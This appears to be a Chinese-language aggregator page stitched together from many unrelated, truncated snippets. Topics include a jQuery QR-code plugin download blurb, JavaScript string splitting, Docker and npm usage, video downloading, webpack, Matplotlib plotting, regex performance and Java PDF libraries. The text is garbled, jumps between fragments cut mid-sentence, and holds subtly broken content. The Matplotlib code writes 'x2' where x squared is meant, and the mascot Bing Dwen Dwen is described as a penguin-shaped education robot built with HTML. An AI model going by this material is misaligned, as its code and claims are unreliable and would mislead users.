...件介绍 "HTML5在线二维码生成器代码"是一款强大的、用户友好的工具，旨在帮助用户快速、便捷地生成高质量的二维码。此插件专为那些需要在网站或应用程序中集成二维码功能的开发者和设计者量身打造。它提供了直观的界面和一系列定制选项，使用户能够根据具体需求调整二维码的各项参数。用户只需输入想要转换成二维码的URL地址，即可立即生成对应的二维码。此外，该插件还支持自定义二维码的等级（即错误纠正能力），从L到H，让用户根据实际应用场景选择最合适的编码质量。同时，用户还可以自由设定二维码的前景色和背景色，确保生成的二维码与网页设计风格保持一致，提升整体美观度。生成过程简单高效，无需任何编程知识，即使是技术新手也能轻松上手。这款插件不仅适用于个人项目，也非常适合企业、教育机构等各类组织使用，广泛应用于产品推广、信息分享、会员认证等多个领域。通过灵活运用其功能，用户可以创建出既专业又个性化的二维码，满足多样化的需求，从而提升用户体验和互动效果。总之，“HTML5在线二维码生成器代码”是一款集实用性与易用性于一身的工具，无论是个人开发者还是团队合作，都能从中获益匪浅，极大地简化了二维码生成流程，为数字化内容传播提供了强大助力。 点我下载 文件大小：174.81 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...方法无疑是其中的关键工具。然而，在大型项目或更复杂的场景下，开发者可能需要更高级的字符串解析功能，例如处理嵌套分隔符、正则表达式匹配等。为此，可以关注近期发布的JavaScript库如lodash和ramda，它们提供了丰富的字符串操作函数，增强了对复杂字符串处理的能力。 举例来说，lodash库中的_.split()函数不仅支持基础的字符串分割，还能结合lodash的其他函数实现深度字符串处理逻辑。另外，对于CSV、JSON等特殊格式的字符串转换，可以借助于专门的数据处理库如papaparse（CSV）和json5（JSON），这些库能帮助开发者高效准确地将字符串内容转化为可进一步操作的数据结构。 同时，随着ES6及后续版本的发布，JavaScript语言本身也在不断强化对字符串操作的支持，诸如模板字面量、扩展运算符以及新增的String.prototype.matchAll()等方法，都为字符串处理提供了更为强大的内建能力。 因此，前端开发者在面对字符串分割问题时，除了掌握基础的split()方法之外，还应持续关注和学习现代JavaScript特性和相关工具库的发展，以便在实际项目中更加灵活高效地进行字符串处理。通过深入了解并合理运用这些资源，能够有效提升代码质量与开发效率，更好地应对各种前端开发挑战。

...d命令时按照顺序逐行解析并执行，最终生成一个新的定制化Docker镜像。文中提到的Dockerfile使用了COPY指令，将本地的myfolder文件夹复制到新构建的Docker容器内部。 Docker容器 , Docker容器是Docker技术的核心概念，它是基于镜像运行的应用实例。每个容器都包含了运行一个应用所需的所有内容（代码、运行时、库、环境变量等），并且与宿主机和其他容器之间相互隔离。在本文的具体场景中，我们通过Dockerfile创建了一个新的Docker镜像，并使用docker run命令启动了一个基于该镜像的新容器，在这个容器内部，我们成功地将本地的myfolder文件夹复制了过来。

...视频内容的普及，下载在线视频的需求日益增长。然而，在实际操作过程中，用户不仅会遇到HTML代码形式的视频链接，还可能面临版权保护、格式转换、不同平台限制等诸多挑战。例如，许多流媒体网站如YouTube、Netflix等采用了加密或者专用播放器技术，使得直接获取视频文件链接变得更为复杂。 近日，一些开发者推出了专门针对此类问题的浏览器插件，如“Video DownloadHelper”（适用于Firefox）和“Internet Download Manager”等工具，它们能智能解析网页中的视频源地址，帮助用户轻松下载各类嵌入式或加密视频。同时，对于版权问题，用户应确保遵循相关法律法规，尊重原创者权益，仅下载公开授权或个人已购买的内容。 深入探讨HTML结构与视频资源的关系时，我们可以追溯到HTML5标准的制定，它为视频标签 提供了原生支持，允许网页直接嵌入并播放视频，而无需借助Flash等第三方插件。这也意味着，理解HTML代码对于获取视频资源愈发重要。 此外，随着5G、AI等前沿技术的应用，未来视频分发和存储方式可能发生变革，例如通过P2P网络传输、分布式存储等新型模式，用户下载视频的方式或将迎来更多创新解决方案。因此，掌握如何从复杂网络环境中提取视频文件，无论是对普通网民还是专业开发者而言，都是一项与时俱进且实用的技术技能。

...的一个加载器，它可以解析这种单文件组件（SFC, Single File Component），并将其转换为可在浏览器中运行的代码。 Webpack , Webpack是一个流行的前端资源模块打包工具，它能处理项目中的各种静态资源（如JavaScript、CSS、图片等），并通过loader和plugins机制进行编译、转换、打包等工作。在Vue开发中，通过配置webpack及vue-loader插件，可以实现对.vue文件的解析和打包，最终生成可在浏览器环境下运行的JavaScript代码，方便Vue组件的复用和管理。

...个用于画出资料可视化工具的函数函数库，有许多画出函数图形的函数可以调用。 导入Matplotlib函数库 import matplotlib.pyplot as plt 定义函数 def f(x): return x2 在[-5,5]之间生成x坐标值 x = range(-5, 6) 画出函数图形 plt.plot(x, [f(i) for i in x]) 显示图形 plt.show() 在这段代码中，我们首先导入了Matplotlib函数库。接着，定义了一个函数，即$f(x)=x^2$。然后，在区间$[-5,5]$之间生成了x坐标值。最后，调用plot()函数画出函数的图形。 由于Matplotlib函数库十分强劲，因此我们可以根据需要来设置函数图形的各类属性，如线型、颜色、字体等，以此来更好地展现函数。 总之，调用Python画出函数图形可以帮助我们更好地理解函数的特性和性质，对于学习数学和计算机科学都十分有用。

...是普及编程教育的重要工具之一，许多在线编程课程和教材通过引导学生亲手实现不同版本的斐波那契数列生成器，帮助他们理解递归、迭代、动态规划等核心编程概念，并借此锻炼问题分解与抽象思维能力。 总之，从基础算法实现到前沿科技应用，斐波那契数列都展现了其深远而广泛的影响力。对于热衷于算法研究和技术探索的开发者而言，不断挖掘这一经典数列背后的数学之美及其在现代科技中的独特作用，无疑将对提升自身技术水平产生积极影响。

...的标签可能导致浏览器解析DOM树时产生误解，影响CSS选择器匹配与JavaScript执行，进而引发页面布局错乱甚至空白的问题。 实际上，随着Web Components、Shadow DOM等现代Web技术的发展，遵循语义化标准编写HTML的重要性更加凸显。Google在其AMP（Accelerated Mobile Pages）项目中就强调了正确使用HTML标签以提升页面性能的重要性，明确要求开发者注意标签闭合、属性完整等编码规范。 此外，在实际项目中，如电商平台或新闻网站，由于图片资源众多，确保标签的src属性设置准确无误尤为关键。近期有报道显示，某知名电商网站因部分商品图片路径失效导致用户体验下降，经过排查发现是由于后台生成的HTML代码中图片src属性值未能动态更新所造成。这一实例再次提醒我们，即便是在动态生成内容的场景下，也要严格把控HTML代码质量，避免出现类似资源加载失败的现象。 总结来说，无论从基础的网页开发规范还是前沿的性能优化实践来看，深入理解和重视HTML代码编写中的细微之处，对于构建高质量、高性能的Web应用都具有重要意义。在日常开发工作中，定期进行代码审查，借助自动化工具检查标签闭合、资源引用等问题，将有助于减少因这类低级错误带来的用户界面故障，并有效提升整体项目的稳定性和用户体验。

...为实现数据分析的重要工具之一，能够借助内置函数或第三方库（如Pandas）高效处理和解析数据，包括但不限于数值分段、计算和转换等操作。 网络爬虫 , 网络爬虫是一种自动获取网页内容的程序，它通过模拟人类浏览器的行为，按照一定的规则自动遍历互联网上的信息资源，从而抓取并存储所需的数据。在网络爬虫技术的应用场景中，Python因其灵活、高效的特性，常被用来编写爬虫脚本以批量收集网络数据。文中提及Python的数学运算能力也能帮助开发者在抓取数据后对数字信息进行实时处理和格式转换，满足特定业务需求。

...技术开发的交互式学习工具，这些工具不仅丰富了教育资源的形式，更极大提升了孩子们的学习兴趣和效果。 以冰墩墩为例，其可爱的企鹅外形设计和智能语音交互功能体现了人性化和科技感并重的产品设计理念。事实上，2023年某权威教育科技论坛上，专家们就曾热议“未来教育机器人如何利用AI及自然语言处理技术，实现更加精准高效的个性化教学”。而HTML5等新一代网络标准的应用，则使得教育内容可以跨平台、富媒体化呈现，为在线教育提供了更为广阔的发展空间。 与此同时，随着编程教育的普及，许多学校已将编写HTML代码纳入课程体系，让学生从小接触并掌握这一基础的网页编程语言，从而培养他们的逻辑思维能力和创新能力。这也意味着，像冰墩墩这类由HTML构建的教育机器人，在激发孩子学习热情的同时，或许正在悄然孕育着下一代的科技创新者。 综上所述，从冰墩墩的诞生到教育领域前沿技术的探讨，我们不难看出，无论是具体的教育机器人产品，还是作为技术支持的HTML语言，都在深度影响并重塑着未来的教育格局和人才培养方式。

...大且灵活的正则表达式工具，特别在处理复杂和大规模文本时具有更高的性能表现。此外，许多第三方库如regex-tdfa和aho-corasick通过采用不同的算法策略来提升搜索效率，也是值得开发者关注和研究的方向。 综上所述，对正则表达式性能问题的关注和解决并非一蹴而就，而是需要持续跟踪最新的技术动态，结合实际应用场景灵活运用各种优化策略和技术手段，才能在保障程序稳定性和准确性的同时，最大程度地提升处理大规模字符串任务的效率。

...何利用正则表达式高效解析JSON和XML数据结构，这对于提升数据分析效率至关重要。此外，作者还分享了在抓取网页内容时，如何精准提取特定标签内的信息，展示了正则表达式在Web scraping任务中的关键作用。同时，文章讨论了正则表达式在文本清洗过程中过滤特殊字符、标准化日期格式以及识别电子邮件、URL等常见字符串模式的实践方法。 对于希望更深入理解并有效应用Python正则表达式的开发者来说，这篇深度解读与实战指导相结合的文章无疑是极具时效性和针对性的延伸阅读材料，它将帮助读者应对更为复杂的文本处理挑战，提高开发效率，并助力实现项目目标。

...档等多种类型的PDF生成。 值得注意的是，无论是iText还是PDFBox，都遵循了Apache 2.0开源协议，确保了开发者在商业项目中的自由使用。同时，它们均提供了详细的官方文档和丰富的社区资源，便于开发者深入学习和解决实际问题。 另外，随着云计算和微服务架构的发展，越来越多的服务提供商如Google Cloud、阿里云等也推出了基于RESTful API的云端PDF处理服务，使得开发者无需直接在本地应用中集成上述库，即可轻松完成PDF与字符串之间的转换任务，进一步提升了开发效率与系统的可扩展性。 综上所述，在面对PDF与String互转这一需求时，Java开发者可以根据具体场景选择合适的工具或服务，以适应快速变化的技术环境和业务需求。对于希望深入了解和掌握PDF处理技术的开发者来说，持续关注并研究这些最新的技术和解决方案，无疑将极大地提升自身在文档处理领域的专业能力。

...的命令。它会输出一个JSON格式的数据，包括虚拟容器的网络配置信息和其他详细信息。 如果您正在使用Docker Compose，可以在docker-compose.yml文件中使用ports关键字来映射端口。例如： ports: - "8080:80" 此配置将将Nginx虚拟容器的80端口转发到主机的8080端口。 除了上述方法，还有其他方式可以从Docker虚拟容器外部接入应用。如果您想深入了解Docker虚拟容器网络和端口转发的更多细节，请查看Docker官方文档。

... package.json ./ RUN npm install COPY . . CMD ["npm", "start"] 该Dockerfile执行Node.js作为基础容器，并在其中添加了NPM。它将我们的应用程序文件移动至/app目录，并通过CMD运行NPM。接下来，执行docker build命令来创建该镜像： docker build -t mynpm . 这个命令会创建一个名为"mynpm"的镜像。一旦创建完成，我们就可以通过以下命令将其运行： docker run -it --rm mynpm 这个命令将在交互模式下运行容器，并在容器中运行NPM。如果我们需要将宿主机的文件夹映射到容器中，以便可以对代码进行更改和调试，则可以执行以下命令： docker run -it --rm -v "$(pwd)":/app mynpm 此命令将把当前项目目录绑定到容器的/app目录中。 在容器中安装npm包很容易。只需执行docker run -it --rm mynpm 命令进入交互模式，然后在其中运行npm install即可。 在完成容器的创建和运行后，我们现在已经拥有了一个可重复、可移植并且易于管理的NPM环境！